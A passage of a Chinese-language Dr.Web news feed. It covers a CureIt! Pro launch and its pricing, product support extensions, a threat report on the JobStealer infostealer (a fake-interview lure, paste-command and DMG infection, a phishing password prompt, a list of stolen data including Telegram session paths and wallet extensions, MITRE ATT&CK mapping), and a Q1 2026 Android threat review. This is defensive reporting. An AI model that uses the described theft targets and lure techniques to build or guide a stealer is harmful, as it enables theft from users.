&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 更多详情&lt;/p&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; 更多详情&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15266&amp;lng=cn</guid><title>期盼已久！Dr.Web CureIt! Pro 已发布，供所有用户免费体验</title><link>https://news.drweb.cn/show/?i=15266&amp;lng=cn&amp;c=5</link><pubDate>Tue, 23 Jun 2026 11:56:31 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;欢迎体验Dr.Web CureIt! Pro版！这是久负盛名的清除工具 Dr.Web CureIt! 的扩展版。产品已上线，您现在就可以免费试用。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;如何免费获取Dr.Web CureIt! Pro&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;新用户&lt;/strong&gt;：访问网站 &lt;a href="https://free.drweb.cn/download+cureit+free/?lng=cn"&gt;free.drweb.cn&lt;/a&gt;，填写获取普通 Dr.Web CureIt! 的信息卡，即可获得带有Dr.Web CureIt! Pro 下载链接，授权期为1 天。没有任何隐藏费用：只需填写信息，即可使用产品的高级设置来清除您计算机上的安全威胁。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;现有付费版 Dr.Web CureIt! 用户：&lt;/strong&gt;登录个人空间，您会看到 Dr.Web CureIt! Pro下载链接。可在您的授权有效期内下载使用，没有任何限制。&lt;/p&gt;&lt;p&gt;使用Pro 版可灵活进行扫描设置、排除项管理、手动指定威胁处理操作，并可获得详细的统计信息。&lt;/p&gt;&lt;p&gt;温馨提示：在网站 &lt;a href="https://free.drweb.cn/download+cureit+free/?lng=cn"&gt;free.drweb.cn&lt;/a&gt; 获得 1 天免费试用属特别优惠，是让您无需付费即可体验 Pro 版的所有优势。此优惠有效期截止至2026 年 6 月 30 日。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;自 2026 年 7 月 1 日 起，将提供：&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;经典免费版 Dr.Web CureIt!，可下载用于紧急修复；&lt;/li&gt;&lt;li&gt;具有高级设置的Dr.Web CureIt! Pro版。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;还有问题或发现程序运行异常？您的意见对我们非常重要。&lt;a href="https://forum.drweb.com/index.php?showforum=92"&gt;请在我们的官方论坛指定置顶帖中留下您的意见和建议。&amp;nbsp;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;立即下载 Dr.Web CureIt! Pro，利用高级设置对清除过程进行完全掌控！&lt;/strong&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15268&amp;lng=cn</guid><title>Dr.Web CureIt!将更加便捷：Pro版即将发布</title><link>https://news.drweb.cn/show/?i=15268&amp;lng=cn&amp;c=5</link><pubDate>Wed, 10 Jun 2026 17:25:52 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;我们通过分析用户反馈得出一个重要结论，就是在计算机被感染的危急时刻，用户最需要的不是复杂的设置，而是一个快速、简单且可靠的解决方案，一个一键即可启动并修复系统的解决方案。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;据此我们重新考量这款实用工具的运行原则。经典的Dr.Web CureIt! 免费版仍将继续为您服务，但将更加专注于核心功能：只需下载、点击“扫描”即可。这是一款用于紧急修复的快速可靠的扫描仪，能够清除活跃威胁并修复系统。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;而需要掌控扫描过程的用户该如何满足呢？&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;我们并没有去掉高级功能。相反，我们将这些功能整合为独立产品Dr.Web CureIt! Pro ，并使其更加便捷易懂。如果您需要扫描移动载体、排除对某些文件夹的扫描或设置侦测到威胁后自动对其采取操作，那么这款新品就是您可以极低的费用获得的灵活且全功能的扫描仪。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;具体使用方式&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;简单且免费：下载普通的 Dr.Web CureIt!后即可立即启动快速扫描。这是紧急情况下的理想解决方案。&lt;/li&gt;&lt;li&gt;如需要更多功能：可在我们的网站或直接在免费版购买 Dr.Web CureIt! Pro，获得对所有高级设置的使用权限。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这样，我们让用户自己做出选择：需要快捷可选择免费；需要最大灵活性则只需进行象征性的支付： 5 天 5元，10 天 10元 。&lt;/p&gt;&lt;p&gt;Dr.Web CureIt! Pro 将于 7 月初发布。在发布前一周，我们将向所有用户提供 Pro 全部功能的免费试用权限，以便您在做出选择前能进行实际体验。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15257&amp;lng=cn</guid><title>Dr.Web产品支持期限变更</title><link>https://news.drweb.cn/show/?i=15257&amp;lng=cn&amp;c=5</link><pubDate>Wed, 27 May 2026 10:54:19 GMT</pubDate><description>&lt;p&gt;根据产品生命周期政策，多款Dr.Web产品支持期限延长。&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web Enterprise Security Suite管理中心，版本13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial，版本13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Desktop Security Suite所包含产品：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Windows工作站Dr.Web保护产品12.0 &lt;/li&gt;&lt;li&gt;macOS工作站Dr.Web保护产品12.0 &lt;/li&gt;&lt;li&gt;Linux工作站Dr.Web保护产品11.1 &lt;/li&gt;&lt;li&gt;Dr.Web Katana Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Server Security Suite所包含产品：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Windows服务器Dr.Web保护产品12.0 &amp;nbsp;&lt;/li&gt;&lt;li&gt;UNIX服务器Dr.Web保护产品11.1 &amp;nbsp;&lt;/li&gt;&lt;li&gt;macOS服务器Dr.Web保护产品12.0 &amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Mail Security Suite所包含产品：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;UNIX邮箱服务器Dr.Web保护产品11.1 &lt;/li&gt;&lt;li&gt;Dr.Web 12.0 для Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Gateway Security Suite所包含产品：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;UNIX互联网网关Dr.Web保护产品11.1&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Mobile Security Suite所包含产品：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Android移动设备Dr.Web保护产品12.0 &amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;变更后的支持期限请查阅&lt;a href="https://support.drweb.com/lifecycle/"&gt;产品生命周期页面&lt;/a&gt;。&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15253&amp;lng=cn</guid><title>工作没找到，钱和数据也没了：窃密木马伪装成在线面试，同时进攻macOS与Windows用户</title><link>https://news.drweb.cn/show/?i=15253&amp;lng=cn&amp;c=5</link><pubDate>Wed, 27 May 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Doctor Web公司的专家警示广大用户，木马程序JobStealer正在传播，其恶意功能是窃取macOS和Windows 操作系统电脑用户的敏感信息，主要目标是窃取加密币钱包中的数据。诈骗分子以在线面试为幌子，诱骗潜在受害者访问恶意网站，并诱导其安装所谓的视频会议应用程序，实际上这个视频会议应用就是木马JobStealer。&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;攻击一开始通常是骗子与潜在受害者取得联系，谎称有职位可以应聘。随后，骗子会邀请受害者参加面试，并提供所谓"在线会议平台"网站的链接，称用于接入视频会议。这些网站看起来很正规，但实际上完全是欺诈网站的。用户从这些网站上下载的所谓在线会议软件实际上是恶意程序JobStealer。网络犯罪分子会使用不同的网页设计，并频繁更改该恶意软件的名称。我司专家已发现的变种名称就包括：MeetLab、Juseo、Meetix、Carolla 等。在某些情况下，犯罪分子还会使用真实服务的名称，例如 Webex。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;下载JobStealer的所谓视频连线服务网站示例&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;为了让用户相信这些是正常运转的平台，诈骗分子还开通了相应的Telegram 频道和社交媒体账号（例如 X）。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;恶意攻击者会在社交网络上制造假象，借此迷惑用户相信木马是正常软件&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;恶意网站给在macOS设备用户被提供两种选项：&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;复制网站上指定的 bash 命令并在终端中执行;&lt;/li&gt;
&lt;li&gt;下载 DMG 格式的磁盘映像文件&lt;span class="string"&gt;.dmg&lt;/span&gt;并运行。&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;木马JobStealer过恶意网站传播，诱骗访问者下载DMG 容器形式，或在终端执行 bash 命令&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;用户选择第一种情况在终端中执行命令时，系统会自动从互联网下载并运行一个脚本，该脚本进而下载并启动 JobStealer 的可执行文件（我们将其侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;）。&lt;/p&gt;

&lt;p&gt;第二种情况下载的 DMG 映像文件本身已包含上述文件。用户挂载该映像后，会看到应用程序的“安装”说明。说明中要求用户打开终端，并将附带的一个脚本拖入终端窗口。然而，该脚本实际上不会安装视频会议软件，而是会启动木马文件。&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;木马JobStealer映像文件打开时显示的安装说明&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;是一个 Fat Mach-O 格式的可执行文件容器，包含适用x64 和 arm64 两种处理器架构的二进制代码。木马在被感染的计算机上启动时，程序会根据目标平台自动调用与 CPU 架构相对应的组件。&lt;/p&gt;

&lt;p&gt;需要说明的是，&lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt; 存在多个不同版本。较早的恶意版本不支持 arm64 架构的Mac电脑上运行，同时也不具备代码混淆功能，木马编写者是在后续更新窃取程序的过程中，才开始添加并逐步增强混淆能力。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt; 启动后会显示一个钓鱼窗口，提示用户程序在运行中出现错误。“修复”错误需要用户输入其账户密码。&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;请求输入Mac用户账户密码的钓鱼窗口&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;随后，&lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt; 会收集以下数据：&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;操作系统版本和计算机标识符；&lt;/li&gt;
&lt;li&gt;约 300 个Chromium浏览器（Chrome、Opera、Brave、OperaGX、Vivaldi、Edge、Arc、CocCoc）安装的加密币钱包浏览器插件的数据；&lt;/li&gt;
&lt;li&gt;这些浏览器的 Cookie文件；&lt;/li&gt;
&lt;li&gt;保存在浏览器自动填充表中的密码及银行卡数据；&lt;/li&gt;
&lt;li&gt;Telegram 通讯软件目录 &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; 和 &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;的文件，其中包含会话授权密钥、已下载文件等；&lt;/li&gt;
&lt;li&gt;macOS 原生“备忘录”应用中的用户笔记；&lt;/li&gt;
&lt;li&gt;系统中是否安装了Ledger Live和Trezor Suite等加密币钱包应用。&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;这些数据被打包成ZIP压缩包并上传至C2服务器。&lt;/p&gt;

&lt;p&gt;木马编写者还位 Windows操作系统准备了相应版本的 JobStealer 木马，其功能与 macOS 版本类似。此外，在部分传播这种窃取程序的恶意网站，还提供适用其他主流操作系统的应用版本。不过截至目前，我公司病毒分析师尚未发现这些版本的实际传播。例如，用于Linux系统的下载按钮要么不可用，要么指向的是木马的 Windows 版本。而针对 iOS 和 Android 设备的下载分区中显示正在开发这些版本。不能排除未来恶意攻击者会传播针对上述平台的木马变种的可能性。&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;恶意网站有可能会传播针对Linux、iOS及Android系统的 JobStealer 木马变种&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;有恶意应用 JobStealer所已知变种，我公司产品Dr.Web Security Space 的 macOS 和 Windows 版本均可进行可靠侦测和清除，因此不能对我公司产品用户构成威胁。传播该木马的欺诈网站也已列入不建议及危险资源库，同样会被Dr.Web 拦截。
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;我们依据 MITRE&amp;nbsp;ATT&amp;amp;CK® 框架对 JobStealer 恶意程序进行了分析。该框架是一个描述网络犯罪分子攻击信息系统所使用的战术与技术的矩阵。分析结果包括以下关键技术：&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;阶段&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;技术&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;执行&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;用户执行（T1204）&lt;/p&gt;
&lt;p&gt;恶意复制与粘贴（T1204.004）&lt;/p&gt;
&lt;p&gt;恶意文件（T1204.002）&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;发现&lt;/td&gt;
&lt;td&gt;发现文件和目录 (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;数据收集&lt;/td&gt;
&lt;td&gt;&lt;p&gt;自动收集（T1119）&lt;/p&gt;
&lt;p&gt;本地系统的数据（T1005）&lt;/p&gt;
&lt;p&gt;密码存储库的账户信息（T1555）&lt;/p&gt;
&lt;p&gt;钥匙串（T1555.001）&lt;/p&gt;
&lt;p&gt;来自浏览器的账户信息（T1555.003）&lt;/p&gt;
&lt;p&gt;捕获键盘输入（T1056）&lt;/p&gt;
&lt;p&gt;捕获图形界面输入（T1056.002）&lt;/p&gt;
&lt;p&gt;对收集数据进行归档（T1560）&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;指挥与控制&lt;/td&gt;
&lt;td&gt;Web服务(T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;数据外发&lt;/td&gt;
&lt;td&gt;&lt;p&gt;针对外发 (T1020)&lt;/p&gt;
&lt;p&gt;通过控制通道外发(T1041)&lt;/p&gt;
&lt;p&gt;通过Web服务外发 (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Mac.PWS.JobStealer.1&amp;lng=cn"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;更多详情&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;失陷指标&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15136&amp;lng=cn</guid><title>Doctor Web：2026年第一季度移动设备病毒活动综述</title><link>https://news.drweb.cn/show/?i=15136&amp;lng=cn&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026.04.01&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;根据Dr.Web Security Space移动设备保护产品的侦测统计数据，显示烦人广告的恶意软件 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 在2026年第一季度的活跃程度持续下降。与去年第四季度相比，在受保护设备的侦测频率分别下降了32.70%和7.09%。替代这些恶意软件成为主要威胁的是 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 家族的银行木马，其活动在过去三个月中的增长超过2.5倍以，成为最常见的安卓威胁。这些恶意应用程序能够拦截包含银行交易确认码的短信，显示钓鱼窗口，还可以模仿合法的银行软件来窃取机密数据。用户最常遭遇的是属于 &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; 子家族的木马，该子家族包含多种恶意软件。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;此外，使用NP Manager黑客修改工具修改并通过添加垃圾代码来混淆逻辑的应用程序在第一季度也广泛传播，占到侦测总量的15.35%。去年秋季以来，&lt;b&gt;Android.Banker.Mamont&lt;/b&gt; 木马家族就已积极属于此类工具，目的是逃避反病毒软件的侦测。因此，发现应用程序被修改时，我们的产品会发出警告。Dr.Web反病毒产品将此类软件侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;另一种常见的威胁软件类型仍然是使用NPManager工具（Dr.Web将其侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.NPMod&amp;lng=cn"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;）修改过的程序，尽管侦测量下降了31.65%。这种工具包含用于保护和混淆程序代码的各种模块，以及在修改后绕过数字签名验证的功能，被网络犯罪分子用来保护恶意软件，增加反病毒软件将其侦测的难度。&lt;/p&gt;

&lt;p&gt;最常见的不良应用是伪装成反病毒软件的 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;，声称可以侦测威胁，但需要用户购买完整版才能“清除”威胁。用户还遭遇了 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeMoney&amp;lng=cn"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt; 家族的程序，一种是声称用户通过完成各种任务可以赚钱，一种是通过CloudInject云服务修改过的软件。这种访问用于向应用程序添加危险的系统权限和其功能不可控制的混淆后代码。&lt;/p&gt;

&lt;p&gt;在众多广告软件中，侦测最多的是所谓优化程序 &lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;，会定期弹出通知，谎称内存不足或存在系统错误，但实际上是在“优化”过程中显示广告。另一种侦测较多的广告软件是 &lt;b&gt;Adware.Opensite.15&lt;/b&gt;，攻击者将其伪装成用来获取游戏资源的游戏作弊工具。实际上这些程序会加载各种显示广告的网站。嵌入 &lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; 广告模块的程序也在广泛传播。&lt;/p&gt;

&lt;p&gt;今年1月，DoctorWeb向用户&lt;a href="https://news.drweb.cn/show/?i=15110" target="_blank"&gt;通报&lt;/a&gt;新型点击木马家族 &lt;b&gt;Android.Phantom&lt;/b&gt;。我们的病毒分析师发现该恶意软件有多个传播渠道，其中包括小米设备的官方应用商店Get Apps，该木马程序被嵌入到上架的多个游戏。网络犯罪分子还通过各种Telegram频道、Discord服务器、在线软件合集和恶意网站传播嵌入点击器热门应用修改版。&lt;/p&gt;

&lt;p&gt;攻击者在 &lt;b&gt;Android.Phantom&lt;/b&gt; 利用机器学习技术和Web RTC技术（一种通过浏览器传输包括视频在内的流数据的技术）来增加网站广告点击量。这些木马程序会在一个不可见的WebView中加载目标网络资源以及JavaScript代码用于模拟用户操作。与广告的交互有两种模式。如果设备支持WebRTC，&lt;b&gt;Android.Phantom&lt;/b&gt; 点击器会将加载了网站的虚拟屏幕展示给攻击者，攻击者可以手动或使用自动化系统控制屏幕。&lt;/p&gt;

&lt;p&gt;如果WebRTC不可用，则会使用基于TensorFlowJS框架的自动化JavaScript脚本。点击器会从远程服务器下载必要的行为模型，以及包含框架本身和运行模型以及与目标网站交互所需所有函数的JavaScript代码。&lt;/p&gt;

&lt;p&gt;我公司反病毒实验室第一季度在Google Play应用商店侦测到新威胁，其中包括很多 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 木马程序，以及恶意软件 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;。所有这些恶意软件的功能都是为用户订阅付费服务。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第一季度主要移动安全事件：&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;银行木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 成为安卓设备最常见的威胁&lt;/li&gt;
        &lt;li&gt;网络犯罪分子越来越频繁使用安卓应用修改工具来增强银行木马逃避反病毒软件侦测的能力&lt;/li&gt;
        &lt;li&gt;广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 的活动持续下降&lt;/li&gt;
        &lt;li&gt;用户受到木马 &lt;b&gt;Android.Phantom&lt;/b&gt; 的威胁，这类木马利用机器学习和视频流来操纵网站点击量&lt;/li&gt;
        &lt;li&gt;恶意应用仍在通过Google Play传播&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Dr.Web for Android保护产品统计信息&lt;/h3&gt;

&lt;p&gt;&lt;b&gt;最常见的恶意软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;银行木马程序，能拦截包含信贷机构发送的一次性验证码的短信、通知内容，并收集其他机密信息，包括受感染设备的技术数据、已安装应用程序列表、SIM卡信息、通话记录以及收发的短信。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;能够下载其设置中指定的网站的木马，已知变种加载的是在线赌场&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;显示侵入式广告的木马程序。&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 家族的木马通常伪装成普通应用进行传播，某些情况下依靠其他恶意软件安装到系统目录。进入安卓设备后这些广告软件木马通常会隐藏自身在系统中的存在，如隐藏自己在主屏幕菜单中的图标。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测混淆器，该混淆器用于保护恶意应用程序（如某些版本的银行木马 &lt;b&gt;Android.SpyMax&lt;/b&gt;）。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Click&amp;lng=cn"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测恶意Whats App Messenger修改版，这些修改版在用户不知情的情况下在后台加载各种网站。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的不良软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
